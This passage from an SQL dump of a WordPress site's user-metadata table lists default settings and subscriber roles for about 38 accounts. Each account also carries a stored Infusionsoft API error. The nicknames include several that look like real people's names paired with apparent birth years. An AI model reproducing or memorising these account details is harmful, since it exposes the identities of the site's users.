(24213, 1854, 'rich_editing', 'true'),
(24214, 1854, 'comment_shortcuts', 'false'),
(24215, 1854, 'admin_color', 'fresh'),
(24216, 1854, 'use_ssl', '0'),
(24217, 1854, 'show_admin_bar_front', 'true'),
(24218, 1854, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24219, 1854, 'cyb_user_level', '0'),
(24220, 1854, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24221, 1854, 'default_password_nag', '1'),
(24222, 1855, 'nickname', 'sryyoung1993'),
(24223, 1855, 'first_name', ''),
(24224, 1855, 'last_name', ''),
(24225, 1855, 'description', ''),
(24226, 1855, 'rich_editing', 'true'),
(24227, 1855, 'comment_shortcuts', 'false'),
(24228, 1855, 'admin_color', 'fresh'),
(24229, 1855, 'use_ssl', '0'),
(24230, 1855, 'show_admin_bar_front', 'true'),
(24231, 1855, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24232, 1855, 'cyb_user_level', '0'),
(24233, 1855, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24234, 1855, 'default_password_nag', '1'),
(24235, 1856, 'nickname', 'smgmansocom1953'),
(24236, 1856, 'first_name', ''),
(24237, 1856, 'last_name', ''),
(24238, 1856, 'description', ''),
(24239, 1856, 'rich_editing', 'true'),
(24240, 1856, 'comment_shortcuts', 'false'),
(24241, 1856, 'admin_color', 'fresh'),
(24242, 1856, 'use_ssl', '0'),
(24243, 1856, 'show_admin_bar_front', 'true'),
(24244, 1856, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24245, 1856, 'cyb_user_level', '0'),
(24246, 1856, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24247, 1856, 'default_password_nag', '1'),
(24248, 1857, 'nickname', 'rfw_631960'),
(24249, 1857, 'first_name', ''),
(24250, 1857, 'last_name', ''),
(24251, 1857, 'description', ''),
(24252, 1857, 'rich_editing', 'true'),
(24253, 1857, 'comment_shortcuts', 'false'),
(24254, 1857, 'admin_color', 'fresh'),
(24255, 1857, 'use_ssl', '0'),
(24256, 1857, 'show_admin_bar_front', 'true'),
(24257, 1857, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24258, 1857, 'cyb_user_level', '0'),
(24259, 1857, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24260, 1857, 'default_password_nag', '1'),
(24261, 1858, 'nickname', 'dallas398972004'),
(24262, 1858, 'first_name', ''),
(24263, 1858, 'last_name', ''),
(24264, 1858, 'description', ''),
(24265, 1858, 'rich_editing', 'true'),
(24266, 1858, 'comment_shortcuts', 'false'),
(24267, 1858, 'admin_color', 'fresh'),
(24268, 1858, 'use_ssl', '0'),
(24269, 1858, 'show_admin_bar_front', 'true'),
(24270, 1858, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24271, 1858, 'cyb_user_level', '0'),
(24272, 1858, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24273, 1858, 'default_password_nag', '1'),
(24274, 1859, 'nickname', 'loitamsuvoinguoi1977'),
(24275, 1859, 'first_name', ''),
(24276, 1859, 'last_name', ''),
(24277, 1859, 'description', ''),
(24278, 1859, 'rich_editing', 'true'),
(24279, 1859, 'comment_shortcuts', 'false'),
(24280, 1859, 'admin_color', 'fresh'),
(24281, 1859, 'use_ssl', '0'),
(24282, 1859, 'show_admin_bar_front', 'true'),
(24283, 1859, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24284, 1859, 'cyb_user_level', '0'),
(24285, 1859, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24286, 1859, 'default_password_nag', '1'),
(24287, 1860, 'nickname', 'redserpent51985'),
(24288, 1860, 'first_name', ''),
(24289, 1860, 'last_name', ''),
(24290, 1860, 'description', ''),
(24291, 1860, 'rich_editing', 'true'),
(24292, 1860, 'comment_shortcuts', 'false'),
(24293, 1860, 'admin_color', 'fresh'),
(24294, 1860, 'use_ssl', '0'),
(24295, 1860, 'show_admin_bar_front', 'true'),
(24296, 1860, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24297, 1860, 'cyb_user_level', '0'),
(24298, 1860, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24299, 1860, 'default_password_nag', '1'),
(24300, 1861, 'nickname', 'shortyd852009'),
(24301, 1861, 'first_name', ''),
(24302, 1861, 'last_name', ''),
(24303, 1861, 'description', ''),
(24304, 1861, 'rich_editing', 'true'),
(24305, 1861, 'comment_shortcuts', 'false'),
(24306, 1861, 'admin_color', 'fresh'),
(24307, 1861, 'use_ssl', '0'),
(24308, 1861, 'show_admin_bar_front', 'true'),
(24309, 1861, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24310, 1861, 'cyb_user_level', '0'),
(24311, 1861, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24312, 1861, 'default_password_nag', '1'),
(24313, 1862, 'nickname', 'optimuskazama1991'),
(24314, 1862, 'first_name', ''),
(24315, 1862, 'last_name', ''),
(24316, 1862, 'description', ''),
(24317, 1862, 'rich_editing', 'true'),
(24318, 1862, 'comment_shortcuts', 'false'),
(24319, 1862, 'admin_color', 'fresh'),
(24320, 1862, 'use_ssl', '0'),
(24321, 1862, 'show_admin_bar_front', 'true'),
(24322, 1862, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24323, 1862, 'cyb_user_level', '0'),
(24324, 1862, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24325, 1862, 'default_password_nag', '1'),
(24326, 1863, 'nickname', 'nour1950'),
(24327, 1863, 'first_name', ''),
(24328, 1863, 'last_name', ''),
(24329, 1863, 'description', ''),
(24330, 1863, 'rich_editing', 'true'),
(24331, 1863, 'comment_shortcuts', 'false'),
(24332, 1863, 'admin_color', 'fresh'),
(24333, 1863, 'use_ssl', '0'),
(24334, 1863, 'show_admin_bar_front', 'true'),
(24335, 1863, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24336, 1863, 'cyb_user_level', '0'),
(24337, 1863, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24338, 1863, 'default_password_nag', '1'),
(24339, 1864, 'nickname', 'comraderavage1960'),
(24340, 1864, 'first_name', ''),
(24341, 1864, 'last_name', ''),
(24342, 1864, 'description', ''),
(24343, 1864, 'rich_editing', 'true'),
(24344, 1864, 'comment_shortcuts', 'false'),
(24345, 1864, 'admin_color', 'fresh'),
(24346, 1864, 'use_ssl', '0'),
(24347, 1864, 'show_admin_bar_front', 'true'),
(24348, 1864, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24349, 1864, 'cyb_user_level', '0'),
(24350, 1864, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24351, 1864, 'default_password_nag', '1'),
(24352, 1865, 'nickname', 'psu1221811959'),
(24353, 1865, 'first_name', ''),
(24354, 1865, 'last_name', ''),
(24355, 1865, 'description', ''),
(24356, 1865, 'rich_editing', 'true'),
(24357, 1865, 'comment_shortcuts', 'false'),
(24358, 1865, 'admin_color', 'fresh'),
(24359, 1865, 'use_ssl', '0'),
(24360, 1865, 'show_admin_bar_front', 'true'),
(24361, 1865, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24362, 1865, 'cyb_user_level', '0'),
(24363, 1865, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24364, 1865, 'default_password_nag', '1'),
(24365, 1866, 'nickname', 'privat1950'),
(24366, 1866, 'first_name', ''),
(24367, 1866, 'last_name', ''),
(24368, 1866, 'description', ''),
(24369, 1866, 'rich_editing', 'true'),
(24370, 1866, 'comment_shortcuts', 'false'),
(24371, 1866, 'admin_color', 'fresh'),
(24372, 1866, 'use_ssl', '0'),
(24373, 1866, 'show_admin_bar_front', 'true'),
(24374, 1866, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24375, 1866, 'cyb_user_level', '0'),
(24376, 1866, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24377, 1866, 'default_password_nag', '1'),
(24378, 1867, 'nickname', 'larryorkeith1982'),
(24379, 1867, 'first_name', ''),
(24380, 1867, 'last_name', ''),
(24381, 1867, 'description', ''),
(24382, 1867, 'rich_editing', 'true'),
(24383, 1867, 'comment_shortcuts', 'false'),
(24384, 1867, 'admin_color', 'fresh'),
(24385, 1867, 'use_ssl', '0'),
(24386, 1867, 'show_admin_bar_front', 'true'),
(24387, 1867, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24388, 1867, 'cyb_user_level', '0'),
(24389, 1867, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24390, 1867, 'default_password_nag', '1'),
(24391, 1868, 'nickname', 'seniorman8502008'),
(24392, 1868, 'first_name', ''),
(24393, 1868, 'last_name', ''),
(24394, 1868, 'description', ''),
(24395, 1868, 'rich_editing', 'true'),
(24396, 1868, 'comment_shortcuts', 'false'),
(24397, 1868, 'admin_color', 'fresh'),
(24398, 1868, 'use_ssl', '0'),
(24399, 1868, 'show_admin_bar_front', 'true'),
(24400, 1868, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24401, 1868, 'cyb_user_level', '0'),
(24402, 1868, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24403, 1868, 'default_password_nag', '1'),
(24404, 1869, 'nickname', 'fernmig211997'),
(24405, 1869, 'first_name', ''),
(24406, 1869, 'last_name', ''),
(24407, 1869, 'description', ''),
(24408, 1869, 'rich_editing', 'true'),
(24409, 1869, 'comment_shortcuts', 'false'),
(24410, 1869, 'admin_color', 'fresh'),
(24411, 1869, 'use_ssl', '0'),
(24412, 1869, 'show_admin_bar_front', 'true'),
(24413, 1869, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24414, 1869, 'cyb_user_level', '0'),
(24415, 1869, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24416, 1869, 'default_password_nag', '1'),
(24417, 1870, 'nickname', 'pmay121957'),
(24418, 1870, 'first_name', ''),
(24419, 1870, 'last_name', ''),
(24420, 1870, 'description', ''),
(24421, 1870, 'rich_editing', 'true'),
(24422, 1870, 'comment_shortcuts', 'false'),
(24423, 1870, 'admin_color', 'fresh'),
(24424, 1870, 'use_ssl', '0'),
(24425, 1870, 'show_admin_bar_front', 'true'),
(24426, 1870, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24427, 1870, 'cyb_user_level', '0'),
(24428, 1870, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24429, 1870, 'default_password_nag', '1'),
(24430, 1871, 'nickname', 'hillsk8_861988'),
(24431, 1871, 'first_name', ''),
(24432, 1871, 'last_name', ''),
(24433, 1871, 'description', ''),
(24434, 1871, 'rich_editing', 'true'),
(24435, 1871, 'comment_shortcuts', 'false'),
(24436, 1871, 'admin_color', 'fresh'),
(24437, 1871, 'use_ssl', '0'),
(24438, 1871, 'show_admin_bar_front', 'true'),
(24439, 1871, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24440, 1871, 'cyb_user_level', '0'),
(24441, 1871, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24442, 1871, 'default_password_nag', '1'),
(24443, 1872, 'nickname', 'barbara.friedenbach1986'),
(24444, 1872, 'first_name', ''),
(24445, 1872, 'last_name', ''),
(24446, 1872, 'description', ''),
(24447, 1872, 'rich_editing', 'true'),
(24448, 1872, 'comment_shortcuts', 'false'),
(24449, 1872, 'admin_color', 'fresh'),
(24450, 1872, 'use_ssl', '0'),
(24451, 1872, 'show_admin_bar_front', 'true'),
(24452, 1872, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24453, 1872, 'cyb_user_level', '0'),
(24454, 1872, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24455, 1872, 'default_password_nag', '1'),
(24456, 1873, 'nickname', 'tamara.ballard1962'),
(24457, 1873, 'first_name', ''),
(24458, 1873, 'last_name', ''),
(24459, 1873, 'description', ''),
(24460, 1873, 'rich_editing', 'true'),
(24461, 1873, 'comment_shortcuts', 'false'),
(24462, 1873, 'admin_color', 'fresh'),
(24463, 1873, 'use_ssl', '0'),
(24464, 1873, 'show_admin_bar_front', 'true'),
(24465, 1873, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24466, 1873, 'cyb_user_level', '0'),
(24467, 1873, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24468, 1873, 'default_password_nag', '1'),
(24469, 1874, 'nickname', 'wackymahon1956'),
(24470, 1874, 'first_name', ''),
(24471, 1874, 'last_name', ''),
(24472, 1874, 'description', ''),
(24473, 1874, 'rich_editing', 'true'),
(24474, 1874, 'comment_shortcuts', 'false'),
(24475, 1874, 'admin_color', 'fresh'),
(24476, 1874, 'use_ssl', '0'),
(24477, 1874, 'show_admin_bar_front', 'true'),
(24478, 1874, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24479, 1874, 'cyb_user_level', '0'),
(24480, 1874, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24481, 1874, 'default_password_nag', '1'),
(24482, 1875, 'nickname', 'mirfiward1979'),
(24483, 1875, 'first_name', ''),
(24484, 1875, 'last_name', ''),
(24485, 1875, 'description', ''),
(24486, 1875, 'rich_editing', 'true'),
(24487, 1875, 'comment_shortcuts', 'false'),
(24488, 1875, 'admin_color', 'fresh'),
(24489, 1875, 'use_ssl', '0'),
(24490, 1875, 'show_admin_bar_front', 'true'),
(24491, 1875, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24492, 1875, 'cyb_user_level', '0'),
(24493, 1875, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24494, 1875, 'default_password_nag', '1'),
(24495, 1876, 'nickname', 'betsycal1954'),
(24496, 1876, 'first_name', ''),
(24497, 1876, 'last_name', ''),
(24498, 1876, 'description', ''),
(24499, 1876, 'rich_editing', 'true'),
(24500, 1876, 'comment_shortcuts', 'false'),
(24501, 1876, 'admin_color', 'fresh'),
(24502, 1876, 'use_ssl', '0'),
(24503, 1876, 'show_admin_bar_front', 'true'),
(24504, 1876, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24505, 1876, 'cyb_user_level', '0'),
(24506, 1876, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24507, 1876, 'default_password_nag', '1'),
(24508, 1877, 'nickname', 'alexboo001972'),
(24509, 1877, 'first_name', ''),
(24510, 1877, 'last_name', ''),
(24511, 1877, 'description', ''),
(24512, 1877, 'rich_editing', 'true'),
(24513, 1877, 'comment_shortcuts', 'false'),
(24514, 1877, 'admin_color', 'fresh'),
(24515, 1877, 'use_ssl', '0'),
(24516, 1877, 'show_admin_bar_front', 'true'),
(24517, 1877, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24518, 1877, 'cyb_user_level', '0'),
(24519, 1877, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24520, 1877, 'default_password_nag', '1'),
(24521, 1878, 'nickname', 'goaleman1951'),
(24522, 1878, 'first_name', ''),
(24523, 1878, 'last_name', ''),
(24524, 1878, 'description', ''),
(24525, 1878, 'rich_editing', 'true'),
(24526, 1878, 'comment_shortcuts', 'false'),
(24527, 1878, 'admin_color', 'fresh'),
(24528, 1878, 'use_ssl', '0'),
(24529, 1878, 'show_admin_bar_front', 'true'),
(24530, 1878, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24531, 1878, 'cyb_user_level', '0'),
(24532, 1878, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24533, 1878, 'default_password_nag', '1'),
(24534, 1879, 'nickname', 'jennynchance061972'),
(24535, 1879, 'first_name', ''),
(24536, 1879, 'last_name', ''),
(24537, 1879, 'description', ''),
(24538, 1879, 'rich_editing', 'true'),
(24539, 1879, 'comment_shortcuts', 'false'),
(24540, 1879, 'admin_color', 'fresh'),
(24541, 1879, 'use_ssl', '0'),
(24542, 1879, 'show_admin_bar_front', 'true'),
(24543, 1879, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24544, 1879, 'cyb_user_level', '0'),
(24545, 1879, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24546, 1879, 'default_password_nag', '1'),
(24547, 1880, 'nickname', 'elenahalepas2004'),
(24548, 1880, 'first_name', ''),
(24549, 1880, 'last_name', ''),
(24550, 1880, 'description', ''),
(24551, 1880, 'rich_editing', 'true'),
(24552, 1880, 'comment_shortcuts', 'false'),
(24553, 1880, 'admin_color', 'fresh'),
(24554, 1880, 'use_ssl', '0'),
(24555, 1880, 'show_admin_bar_front', 'true'),
(24556, 1880, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24557, 1880, 'cyb_user_level', '0'),
(24558, 1880, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24559, 1880, 'default_password_nag', '1'),
(24560, 1881, 'nickname', 'rlknapp1999'),
(24561, 1881, 'first_name', ''),
(24562, 1881, 'last_name', ''),
(24563, 1881, 'description', ''),
(24564, 1881, 'rich_editing', 'true'),
(24565, 1881, 'comment_shortcuts', 'false'),
(24566, 1881, 'admin_color', 'fresh'),
(24567, 1881, 'use_ssl', '0'),
(24568, 1881, 'show_admin_bar_front', 'true'),
(24569, 1881, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24570, 1881, 'cyb_user_level', '0'),
(24571, 1881, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24572, 1881, 'default_password_nag', '1'),
(24573, 1882, 'nickname', 'pippa.adderley1965'),
(24574, 1882, 'first_name', ''),
(24575, 1882, 'last_name', ''),
(24576, 1882, 'description', ''),
(24577, 1882, 'rich_editing', 'true'),
(24578, 1882, 'comment_shortcuts', 'false'),
(24579, 1882, 'admin_color', 'fresh'),
(24580, 1882, 'use_ssl', '0'),
(24581, 1882, 'show_admin_bar_front', 'true'),
(24582, 1882, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24583, 1882, 'cyb_user_level', '0'),
(24584, 1882, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24585, 1882, 'default_password_nag', '1'),
(24586, 1883, 'nickname', 'tuanninh1990'),
(24587, 1883, 'first_name', ''),
(24588, 1883, 'last_name', ''),
(24589, 1883, 'description', ''),
(24590, 1883, 'rich_editing', 'true'),
(24591, 1883, 'comment_shortcuts', 'false'),
(24592, 1883, 'admin_color', 'fresh'),
(24593, 1883, 'use_ssl', '0'),
(24594, 1883, 'show_admin_bar_front', 'true'),
(24595, 1883, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24596, 1883, 'cyb_user_level', '0'),
(24597, 1883, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24598, 1883, 'default_password_nag', '1'),
(24599, 1884, 'nickname', 'kgliebe1950'),
(24600, 1884, 'first_name', ''),
(24601, 1884, 'last_name', ''),
(24602, 1884, 'description', ''),
(24603, 1884, 'rich_editing', 'true'),
(24604, 1884, 'comment_shortcuts', 'false'),
(24605, 1884, 'admin_color', 'fresh'),
(24606, 1884, 'use_ssl', '0'),
(24607, 1884, 'show_admin_bar_front', 'true'),
(24608, 1884, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24609, 1884, 'cyb_user_level', '0'),
(24610, 1884, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24611, 1884, 'default_password_nag', '1'),
(24612, 1885, 'nickname', 'mlalbert87861970'),
(24613, 1885, 'first_name', ''),
(24614, 1885, 'last_name', ''),
(24615, 1885, 'description', ''),
(24616, 1885, 'rich_editing', 'true'),
(24617, 1885, 'comment_shortcuts', 'false'),
(24618, 1885, 'admin_color', 'fresh'),
(24619, 1885, 'use_ssl', '0'),
(24620, 1885, 'show_admin_bar_front', 'true'),
(24621, 1885, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24622, 1885, 'cyb_user_level', '0'),
(24623, 1885, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24624, 1885, 'default_password_nag', '1'),
(24625, 1886, 'nickname', 'keahshaharris1974'),
(24626, 1886, 'first_name', ''),
(24627, 1886, 'last_name', ''),
(24628, 1886, 'description', ''),
(24629, 1886, 'rich_editing', 'true'),
(24630, 1886, 'comment_shortcuts', 'false'),
(24631, 1886, 'admin_color', 'fresh'),
(24632, 1886, 'use_ssl', '0'),
(24633, 1886, 'show_admin_bar_front', 'true'),
(24634, 1886, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24635, 1886, 'cyb_user_level', '0'),
(24636, 1886, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24637, 1886, 'default_password_nag', '1'),
(24638, 1887, 'nickname', 'tiptoe19722008'),
(24639, 1887, 'first_name', ''),
(24640, 1887, 'last_name', ''),
(24641, 1887, 'description', ''),
(24642, 1887, 'rich_editing', 'true'),
(24643, 1887, 'comment_shortcuts', 'false'),
(24644, 1887, 'admin_color', 'fresh'),
(24645, 1887, 'use_ssl', '0'),
(24646, 1887, 'show_admin_bar_front', 'true'),
(24647, 1887, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24648, 1887, 'cyb_user_level', '0'),
(24649, 1887, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24650, 1887, 'default_password_nag', '1'),
(24651, 1888, 'nickname', 'richardnewell092005'),
(24652, 1888, 'first_name', ''),
(24653, 1888, 'last_name', ''),
(24654, 1888, 'description', ''),
(24655, 1888, 'rich_editing', 'true'),
(24656, 1888, 'comment_shortcuts', 'false'),
(24657, 1888, 'admin_color', 'fresh'),
(24658, 1888, 'use_ssl', '0'),
(24659, 1888, 'show_admin_bar_front', 'true'),
(24660, 1888, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24661, 1888, 'cyb_user_level', '0'),
(24662, 1888, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24663, 1888, 'default_password_nag', '1'),
(24664, 1889, 'nickname', 'wilcangab1999'),
(24665, 1889, 'first_name', ''),
(24666, 1889, 'last_name', ''),
(24667, 1889, 'description', ''),
(24668, 1889, 'rich_editing', 'true'),
(24669, 1889, 'comment_shortcuts', 'false'),
(24670, 1889, 'admin_color', 'fresh'),
(24671, 1889, 'use_ssl', '0'),
(24672, 1889, 'show_admin_bar_front', 'true'),
(24673, 1889, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24674, 1889, 'cyb_user_level', '0'),
(24675, 1889, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24676, 1889, 'default_password_nag', '1'),
(24677, 1890, 'nickname', 'chemtchr231982'),
(24678, 1890, 'first_name', ''),
(24679, 1890, 'last_name', ''),
(24680, 1890, 'description', ''),
(24681, 1890, 'rich_editing', 'true'),
(24682, 1890, 'comment_shortcuts', 'false'),
(24683, 1890, 'admin_color', 'fresh'),
(24684, 1890, 'use_ssl', '0'),
(24685, 1890, 'show_admin_bar_front', 'true'),
(24686, 1890, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24687, 1890, 'cyb_user_level', '0'),
(24688, 1890, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24689, 1890, 'default_password_nag', '1'),
(24690, 1891, 'nickname', 'ja_landin1987'),
(24691, 1891, 'first_name', ''),
(24692, 1891, 'last_name', ''),
(24693, 1891, 'description', ''),
(24694, 1891, 'rich_editing', 'true'),
(24695, 1891, 'comment_shortcuts', 'false'),
(24696, 1891, 'admin_color', 'fresh'),
(24697, 1891, 'use_ssl', '0'),
(24698, 1891, 'show_admin_bar_front', 'true'),
(24699, 1891, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(24700, 1891, 'cyb_user_level', '0'),
(24701, 1891, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(24702, 1891, 'default_password_nag', '1'),
